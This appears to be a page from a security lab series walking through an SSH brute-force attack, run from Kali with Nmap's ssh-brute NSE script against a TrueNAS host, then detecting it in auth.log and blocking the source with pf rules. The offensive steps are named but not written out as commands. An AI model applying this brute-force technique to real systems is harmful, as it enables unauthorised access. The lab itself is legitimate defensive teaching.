Cybersecurity · NAS Security Attack & Defense Lab · Lab 1 — SSH Brute Force Attack

Lab 1 — SSH Brute Force Attack

Attack: SSH brute-force from Kali against a TrueNAS 13.1 host. Defense: detect in logs and block the attacker with pf.

Scenario

A TrueNAS server and a Kali Linux host run on a segmented lab network. Kali performs reconnaissance, finds SSH (port 22) open, and launches a brute-force attempt with the ssh-brute NSE script. On defense, the activity is detected in /var/log/auth.log and the source IP is immediately blocked with the system firewall.

Offensive

Port 22 (SSH) discovered open

Nmap results showing port 22 open on the target
Nmap shows SSH exposed on the target host.

Brute-force with NSE ssh-brute

Nmap NSE ssh-brute configuration/command
Configuring the ssh-brute NSE script.
ssh-brute attack running against the target
Brute-force in progress from Kali.

Defensive

Incident Detection

Review authentication logs on the server to confirm repeated failures and the source IP.

Viewing /var/log/auth.log entries with repeated failures
Auth log review shows repeated SSH failures.
Additional log view showing usernames tried
Usernames attempted from attacker IP.
Concatenated log showing multiple brute-force attempts
Concatenated view highlights the brute-force pattern.

Immediate Containment with pf

Block the attacker to stop further attempts while you continue incident response.

1) Ensure pf is enabled

# enable pf (if not already)
sudo pfctl -e

# check status / rules
sudo pfctl -sr
Verifying pf status and enabling if necessary
Confirming the firewall is active.

2) Add a block rule for the attacker IP

Edit /etc/pf.conf and add a line replacing ATTACKER_IP with the source:

block in quick from ATTACKER_IP to any
Editing pf.conf to block the attacker IP
Blocking the attacker in pf.conf.

3) Load the updated rules and verify

sudo pfctl -f /etc/pf.conf
sudo pfctl -sr   # confirm rule is present
Reloading pf rules and listing ruleset
Rules reloaded; the block is active.

This immediately cuts off the brute-force source while you proceed with standard IR: scoping, additional log review, credential hygiene, and hardening.

Back to NAS Security Attack & Defense Lab